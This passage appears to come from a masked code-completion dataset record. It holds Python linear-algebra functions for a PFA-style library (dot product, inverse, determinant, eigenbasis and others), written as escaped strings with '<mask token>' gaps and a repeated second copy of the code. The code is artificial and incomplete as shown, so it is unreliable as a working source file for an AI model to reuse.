row in list(x.values())) or any(math\n .isnan(z) or math.isinf(z) for z in list(y.values()))\n rows = list(rowKeys(x))\n cols = list(colKeys(x).union(rowKeys(y)))\n xmat = mapsToMatrix(x, rows, cols)\n ymat = mapToRowVector(y, cols)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, self.name, pos)\n if bad:\n raise PFARuntimeException('contains non-finite value', \n self.errcodeBase + 2, self.name, pos)\n return rowVectorToMap(np().dot(xmat, ymat), rows)\n\n\n<mask token>\n\n\nclass Transpose(LibFcn):\n name = prefix + 'transpose'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Array(P.Array(\n P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()))}], P.Map(P.Map(P\n .Double())))])\n errcodeBase = 24060\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n return [[x[r][c] for r in range(rows)] for c in range(cols)]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n rows = rowKeys(x)\n cols = colKeys(x)\n if len(rows) < 1 or len(cols) < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedMap(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n return dict((c, dict((r, x[r][c]) for r in rows)) for c in cols)\n\n\n<mask token>\n\n\nclass Inverse(LibFcn):\n name = prefix + 'inverse'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Array(P.Array(\n P.Double()))), 
Sig([{'x': P.Map(P.Map(P.Double()))}], P.Map(P.Map(P\n .Double())))])\n errcodeBase = 24070\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n return matrixToArrays(arraysToMatrix(x).I)\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n rows = list(rowKeys(x))\n cols = list(colKeys(x))\n if len(rows) < 1 or len(cols) < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n xmat = mapsToMatrix(x, rows, cols)\n return matrixToMaps(xmat.I, cols, rows)\n\n\n<mask token>\n\n\nclass Trace(LibFcn):\n name = prefix + 'trace'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Double()), Sig\n ([{'x': P.Map(P.Map(P.Double()))}], P.Double())])\n errcodeBase = 24080\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows == 0:\n return 0.0\n else:\n cols = len(x[0])\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 0, self.name, pos)\n return sum(x[i][i] for i in range(min(rows, cols)))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = rowKeys(x).intersection(colKeys(x))\n return sum(x[i][i] for i in keys)\n\n\n<mask token>\n\n\nclass Det(LibFcn):\n name = prefix + 'det'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Double()), Sig\n ([{'x': P.Map(P.Map(P.Double()))}], P.Double())])\n errcodeBase = 24090\n\n def __call__(self, state, scope, 
pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n if rows != cols:\n raise PFARuntimeException('non-square matrix', self.\n errcodeBase + 2, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in row) for row in\n x):\n return float('nan')\n else:\n return float(np().linalg.det(arraysToMatrix(x)))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = list(rowKeys(x).union(colKeys(x)))\n if len(keys) < 1 or all(len(row) == 0 for row in list(x.values())):\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in list(row.\n values())) for row in list(x.values())):\n return float('nan')\n else:\n return float(np().linalg.det(mapsToMatrix(x, keys, keys)))\n\n\n<mask token>\n\n\nclass Symmetric(LibFcn):\n name = prefix + 'symmetric'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'tol': P.Double(\n )}], P.Boolean()), Sig([{'x': P.Map(P.Map(P.Double()))}, {'tol': P.\n Double()}], P.Boolean())])\n errcodeBase = 24100\n\n @staticmethod\n def same(x, y, tol):\n if math.isinf(x) and math.isinf(y) and (x > 0.0 and y > 0.0 or x < \n 0.0 and y < 0.0):\n return True\n elif math.isnan(x) and math.isnan(y):\n return True\n elif not math.isinf(x) and not math.isnan(x) and not math.isinf(y\n ) and not math.isnan(y):\n return abs(x - y) < tol\n else:\n return False\n\n def __call__(self, state, scope, pos, paramTypes, x, tol):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = 
len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n if rows != cols:\n raise PFARuntimeException('non-square matrix', self.\n errcodeBase + 2, self.name, pos)\n return all(all(self.same(x[i][j], x[j][i], tol) for j in range(\n cols)) for i in range(rows))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = list(rowKeys(x).union(colKeys(x)))\n if len(keys) < 1 or all(len(row) == 0 for row in list(x.values())):\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n return all(all(self.same(x.get(i, {}).get(j, 0.0), x.get(j, {})\n .get(i, 0.0), tol) for j in keys) for i in keys)\n\n\n<mask token>\n\n\nclass EigenBasis(LibFcn):\n name = prefix + 'eigenBasis'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Array(P.Array(\n P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()))}], P.Map(P.Map(P\n .Double())))])\n errcodeBase = 24110\n\n def calculate(self, x, size):\n symm = (x + x.T) * 0.5\n evals, evects = np().linalg.eig(symm)\n evects = np().array(evects)\n evects2 = [(evects[:, i] * (-1.0 if evects[0, i] < 0.0 else 1.0)) for\n i in range(size)]\n eigvalm2 = [div(1.0, math.sqrt(abs(ei))) for ei in evals]\n order = np().argsort(eigvalm2)\n out = np().empty((size, size), dtype=np().double)\n for i in range(size):\n for j in range(size):\n out[i, j] = evects2[order[i]][j] * eigvalm2[order[i]]\n return out\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols 
< 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n if rows != cols:\n raise PFARuntimeException('non-square matrix', self.\n errcodeBase + 2, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in row) for row in\n x):\n raise PFARuntimeException('non-finite matrix', self.\n errcodeBase + 3, self.name, pos)\n return matrixToArrays(self.calculate(arraysToMatrix(x), rows))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = list(rowKeys(x).union(colKeys(x)))\n if len(keys) < 1 or all(len(z) == 0 for z in list(x.values())):\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in list(row.\n values())) for row in list(x.values())):\n raise PFARuntimeException('non-finite matrix', self.\n errcodeBase + 3, self.name, pos)\n return matrixToMaps(self.calculate(mapsToMatrix(x, keys, keys),\n len(keys)), list(map(str, range(len(keys)))), keys)\n\n\n<mask token>\n\n\nclass Truncate(LibFcn):\n name = prefix + 'truncate'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'keep': P.Int()}\n ], P.Array(P.Array(P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()\n ))}, {'keep': P.Array(P.String())}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24120\n\n def __call__(self, state, scope, pos, paramTypes, x, keep):\n if isinstance(keep, int) and keep < 0:\n keep = 0\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, 
self.name, pos)\n return x[:keep]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n rows = rowKeys(x)\n cols = colKeys(x)\n if len(rows) < 1 or len(cols) < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n return dict((k, x[k]) for k in rows if k in keep)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef np():\n import numpy\n return numpy\n\n\ndef rowKeys(x):\n return set(x.keys())\n\n\ndef colKeys(x):\n if len(x) == 0:\n return set()\n else:\n return reduce(lambda a, b: a.union(b), [set(xi.keys()) for xi in\n list(x.values())])\n\n\ndef arraysToMatrix(x):\n return np().matrix(x, dtype=np().double)\n\n\ndef arrayToRowVector(x):\n return np().matrix(x, dtype=np().double).T\n\n\n<mask token>\n\n\ndef matrixToArrays(x):\n return x.tolist()\n\n\ndef mapsToMatrix(x, rows, cols):\n return np().matrix([[x.get(i, {}).get(j, 0.0) for j in cols] for i in\n rows], dtype=np().double)\n\n\ndef mapToRowVector(x, keys):\n return np().matrix([x.get(k, 0.0) for k in keys], dtype=np().double).T\n\n\ndef rowVectorToMap(x, keys):\n return dict(list(zip(keys, x.T.tolist()[0])))\n\n\ndef matrixToMaps(x, rows, cols):\n return dict((row, dict(list(zip(cols, xi)))) for row, xi in zip(rows, x\n .tolist()))\n\n\ndef raggedArray(x):\n collens = list(map(len, x))\n return max(collens) != min(collens)\n\n\ndef raggedMap(x):\n return len(set(len(xi) for xi in list(x.values()))) != 1\n\n\nclass MapApply(LibFcn):\n name = prefix + 'map'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'fcn': P.Fcn([P.\n Double()], P.Double())}], P.Array(P.Array(P.Double()))), Sig([{'x':\n P.Map(P.Map(P.Double()))}, {'fcn': P.Fcn([P.Double()], P.Double())}\n ], P.Map(P.Map(P.Double())))])\n errcodeBase = 24000\n\n def __call__(self, state, scope, pos, paramTypes, x, fcn):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n return [[callfcn(state, scope, fcn, [xj]) for xj in xi] for xi in x\n ]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n return dict((i, dict((j, callfcn(state, scope, fcn, [xj])) for \n j, xj in list(xi.items()))) for i, xi in list(x.items()))\n\n\n<mask token>\n\n\nclass Scale(LibFcn):\n name = prefix + 'scale'\n sig = Sigs([Sig([{'x': P.Array(P.Double())}, {'alpha': 
P.Double()}], P.\n Array(P.Double())), Sig([{'x': P.Array(P.Array(P.Double()))}, {\n 'alpha': P.Double()}], P.Array(P.Array(P.Double()))), Sig([{'x': P.\n Map(P.Double())}, {'alpha': P.Double()}], P.Map(P.Double())), Sig([\n {'x': P.Map(P.Map(P.Double()))}, {'alpha': P.Double()}], P.Map(P.\n Map(P.Double())))])\n errcodeBase = 24010\n\n def __call__(self, state, scope, pos, paramTypes, x, alpha):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n return [[(xj * alpha) for xj in xi] for xi in x]\n elif isinstance(x, (list, tuple)):\n return [(xi * alpha) for xi in x]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in x):\n return dict((i, dict((j, xj * alpha) for j, xj in list(xi.items\n ()))) for i, xi in list(x.items()))\n else:\n return dict((i, xi * alpha) for i, xi in list(x.items()))\n\n\n<mask token>\n\n\nclass ZipMap(LibFcn):\n name = prefix + 'zipmap'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'y': P.Array(P.\n Array(P.Double()))}, {'fcn': P.Fcn([P.Double(), P.Double()], P.\n Double())}], P.Array(P.Array(P.Double()))), Sig([{'x': P.Map(P.Map(\n P.Double()))}, {'y': P.Map(P.Map(P.Double()))}, {'fcn': P.Fcn([P.\n Double(), P.Double()], P.Double())}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24020\n\n def __call__(self, state, scope, pos, paramTypes, x, y, fcn):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x) and isinstance(y, (list, tuple)) and all(\n isinstance(yi, (list, tuple)) for yi in y):\n if len(x) != len(y) or any(len(xi) != len(yi) for xi, yi in zip\n (x, y)):\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n return [[callfcn(state, scope, fcn, [xj, yj]) for xj, yj in zip\n (xi, yi)] for xi, yi in zip(x, y)]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())) and isinstance(y, dict) and all(isinstance(y[i],\n dict) for i in list(y.keys())):\n rows = 
rowKeys(x).union(rowKeys(y))\n cols = colKeys(x).union(colKeys(y))\n return dict((i, dict((j, callfcn(state, scope, fcn, [x.get(i, {\n }).get(j, 0.0), y.get(i, {}).get(j, 0.0)])) for j in cols)) for\n i in rows)\n\n\n<mask token>\n\n\nclass Add(LibFcn):\n name = prefix + 'add'\n sig = Sigs([Sig([{'x': P.Array(P.Double())}, {'y': P.Array(P.Double())}\n ], P.Array(P.Double())), Sig([{'x': P.Array(P.Array(P.Double()))},\n {'y': P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),\n Sig([{'x': P.Map(P.Double())}, {'y': P.Map(P.Double())}], P.Map(P.\n Double())), Sig([{'x': P.Map(P.Map(P.Double()))}, {'y': P.Map(P.Map\n (P.Double()))}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24030\n\n def __call__(self, state, scope, pos, paramTypes, x, y):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x) and isinstance(y, (list, tuple)) and all(\n isinstance(yi, (list, tuple)) for yi in y):\n if len(x) != len(y) or any(len(xi) != len(yi) for xi, yi in zip\n (x, y)):\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n return [[(xj + yj) for xj, yj in zip(xi, yi)] for xi, yi in zip\n (x, y)]\n elif isinstance(x, (list, tuple)) and isinstance(y, (list, tuple)):\n if len(x) != len(y):\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n return [(xi + yi) for xi, yi in zip(x, y)]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())) and isinstance(y, dict) and all(isinstance(y[i],\n dict) for i in list(y.keys())):\n rows = rowKeys(x).union(rowKeys(y))\n cols = colKeys(x).union(colKeys(y))\n return dict((i, dict((j, x.get(i, {}).get(j, 0.0) + y.get(i, {}\n ).get(j, 0.0)) for j in cols)) for i in rows)\n else:\n rows = rowKeys(x).union(rowKeys(y))\n return dict((i, x.get(i, 0.0) + y.get(i, 0.0)) for i in rows)\n\n\n<mask token>\n\n\nclass Sub(LibFcn):\n name = prefix + 'sub'\n sig = Sigs([Sig([{'x': P.Array(P.Double())}, {'y': 
P.Array(P.Double())}\n ], P.Array(P.Double())), Sig([{'x': P.Array(P.Array(P.Double()))},\n {'y': P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),\n Sig([{'x': P.Map(P.Double())}, {'y': P.Map(P.Double())}], P.Map(P.\n Double())), Sig([{'x': P.Map(P.Map(P.Double()))}, {'y': P.Map(P.Map\n (P.Double()))}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24040\n\n def __call__(self, state, scope, pos, paramTypes, x, y):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x) and isinstance(y, (list, tuple)) and all(\n isinstance(yi, (list, tuple)) for yi in y):\n if len(x) != len(y) or any(len(xi) != len(yi) for xi, yi in zip\n (x, y)):\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n return [[(xj - yj) for xj, yj in zip(xi, yi)] for xi, yi in zip\n (x, y)]\n elif isinstance(x, (list, tuple)) and isinstance(y, (list, tuple)):\n if len(x) != len(y):\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n return [(xi - yi) for xi, yi in zip(x, y)]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())) and isinstance(y, dict) and all(isinstance(y[i],\n dict) for i in list(y.keys())):\n rows = rowKeys(x).union(rowKeys(y))\n cols = colKeys(x).union(colKeys(y))\n return dict((i, dict((j, x.get(i, {}).get(j, 0.0) - y.get(i, {}\n ).get(j, 0.0)) for j in cols)) for i in rows)\n else:\n rows = rowKeys(x).union(rowKeys(y))\n return dict((i, x.get(i, 0.0) - y.get(i, 0.0)) for i in rows)\n\n\n<mask token>\n\n\nclass Dot(LibFcn):\n name = prefix + 'dot'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'y': P.Array(P.\n Double())}], P.Array(P.Double())), Sig([{'x': P.Map(P.Map(P.Double(\n )))}, {'y': P.Map(P.Double())}], P.Map(P.Double())), Sig([{'x': P.\n Array(P.Array(P.Double()))}, {'y': P.Array(P.Array(P.Double()))}],\n P.Array(P.Array(P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()))},\n {'y': 
P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24050\n\n def __call__(self, state, scope, pos, paramTypes, x, y):\n if paramTypes[1]['type'] == 'array':\n if isinstance(paramTypes[1]['items'], dict) and paramTypes[1][\n 'items']['type'] == 'array':\n bad = any(any(math.isnan(z) or math.isinf(z) for z in row) for\n row in x) or any(any(math.isnan(z) or math.isinf(z) for\n z in row) for row in y)\n xmat = arraysToMatrix(x)\n ymat = arraysToMatrix(y)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, self.name, pos)\n try:\n if bad:\n raise PFARuntimeException('contains non-finite value',\n self.errcodeBase + 2, self.name, pos)\n return matrixToArrays(np().dot(xmat, ymat))\n except ValueError:\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n else:\n bad = any(any(math.isnan(z) or math.isinf(z) for z in row) for\n row in x) or any(math.isnan(z) or math.isinf(z) for z in y)\n xmat = arraysToMatrix(x)\n ymat = arrayToRowVector(y)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, self.name, pos)\n try:\n if bad:\n raise PFARuntimeException('contains non-finite value',\n self.errcodeBase + 2, self.name, pos)\n return rowVectorToArray(np().dot(xmat, ymat))\n except ValueError:\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n elif paramTypes[1]['type'] == 'map':\n if isinstance(paramTypes[1]['values'], dict) and paramTypes[1][\n 'values']['type'] == 'map':\n bad = any(any(math.isnan(z) or math.isinf(z) for z in list(\n row.values())) for row in list(x.values())) or any(any(\n math.isnan(z) or math.isinf(z) for z in list(row.values\n ())) for row in list(y.values()))\n rows = list(rowKeys(x))\n inter = 
list(colKeys(x).union(rowKeys(y)))\n cols = list(colKeys(y))\n xmat = mapsToMatrix(x, rows, inter)\n ymat = mapsToMatrix(y, inter, cols)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, self.name, pos)\n if bad:\n raise PFARuntimeException('contains non-finite value', \n self.errcodeBase + 2, self.name, pos)\n return matrixToMaps(np().dot(xmat, ymat), rows, cols)\n else:\n bad = any(any(math.isnan(z) or math.isinf(z) for z in list(\n row.values())) for row in list(x.values())) or any(math\n .isnan(z) or math.isinf(z) for z in list(y.values()))\n rows = list(rowKeys(x))\n cols = list(colKeys(x).union(rowKeys(y)))\n xmat = mapsToMatrix(x, rows, cols)\n ymat = mapToRowVector(y, cols)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, self.name, pos)\n if bad:\n raise PFARuntimeException('contains non-finite value', \n self.errcodeBase + 2, self.name, pos)\n return rowVectorToMap(np().dot(xmat, ymat), rows)\n\n\n<mask token>\n\n\nclass Transpose(LibFcn):\n name = prefix + 'transpose'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Array(P.Array(\n P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()))}], P.Map(P.Map(P\n .Double())))])\n errcodeBase = 24060\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n return [[x[r][c] for r in range(rows)] for c in range(cols)]\n elif isinstance(x, 
dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n rows = rowKeys(x)\n cols = colKeys(x)\n if len(rows) < 1 or len(cols) < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedMap(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n return dict((c, dict((r, x[r][c]) for r in rows)) for c in cols)\n\n\n<mask token>\n\n\nclass Inverse(LibFcn):\n name = prefix + 'inverse'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Array(P.Array(\n P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()))}], P.Map(P.Map(P\n .Double())))])\n errcodeBase = 24070\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n return matrixToArrays(arraysToMatrix(x).I)\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n rows = list(rowKeys(x))\n cols = list(colKeys(x))\n if len(rows) < 1 or len(cols) < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n xmat = mapsToMatrix(x, rows, cols)\n return matrixToMaps(xmat.I, cols, rows)\n\n\n<mask token>\n\n\nclass Trace(LibFcn):\n name = prefix + 'trace'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Double()), Sig\n ([{'x': P.Map(P.Map(P.Double()))}], P.Double())])\n errcodeBase = 24080\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows == 0:\n return 0.0\n else:\n cols = len(x[0])\n if 
raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 0, self.name, pos)\n return sum(x[i][i] for i in range(min(rows, cols)))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = rowKeys(x).intersection(colKeys(x))\n return sum(x[i][i] for i in keys)\n\n\n<mask token>\n\n\nclass Det(LibFcn):\n name = prefix + 'det'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Double()), Sig\n ([{'x': P.Map(P.Map(P.Double()))}], P.Double())])\n errcodeBase = 24090\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n if rows != cols:\n raise PFARuntimeException('non-square matrix', self.\n errcodeBase + 2, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in row) for row in\n x):\n return float('nan')\n else:\n return float(np().linalg.det(arraysToMatrix(x)))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = list(rowKeys(x).union(colKeys(x)))\n if len(keys) < 1 or all(len(row) == 0 for row in list(x.values())):\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in list(row.\n values())) for row in list(x.values())):\n return float('nan')\n else:\n return float(np().linalg.det(mapsToMatrix(x, keys, keys)))\n\n\n<mask token>\n\n\nclass Symmetric(LibFcn):\n name = prefix + 'symmetric'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'tol': P.Double(\n )}], P.Boolean()), Sig([{'x': 
P.Map(P.Map(P.Double()))}, {'tol': P.\n Double()}], P.Boolean())])\n errcodeBase = 24100\n\n @staticmethod\n def same(x, y, tol):\n if math.isinf(x) and math.isinf(y) and (x > 0.0 and y > 0.0 or x < \n 0.0 and y < 0.0):\n return True\n elif math.isnan(x) and math.isnan(y):\n return True\n elif not math.isinf(x) and not math.isnan(x) and not math.isinf(y\n ) and not math.isnan(y):\n return abs(x - y) < tol\n else:\n return False\n\n def __call__(self, state, scope, pos, paramTypes, x, tol):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n if rows != cols:\n raise PFARuntimeException('non-square matrix', self.\n errcodeBase + 2, self.name, pos)\n return all(all(self.same(x[i][j], x[j][i], tol) for j in range(\n cols)) for i in range(rows))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = list(rowKeys(x).union(colKeys(x)))\n if len(keys) < 1 or all(len(row) == 0 for row in list(x.values())):\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n return all(all(self.same(x.get(i, {}).get(j, 0.0), x.get(j, {})\n .get(i, 0.0), tol) for j in keys) for i in keys)\n\n\n<mask token>\n\n\nclass EigenBasis(LibFcn):\n name = prefix + 'eigenBasis'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Array(P.Array(\n P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()))}], P.Map(P.Map(P\n .Double())))])\n errcodeBase = 24110\n\n def calculate(self, x, size):\n symm = (x + x.T) * 0.5\n evals, evects = np().linalg.eig(symm)\n evects = np().array(evects)\n evects2 = [(evects[:, i] * (-1.0 if evects[0, i] < 0.0 
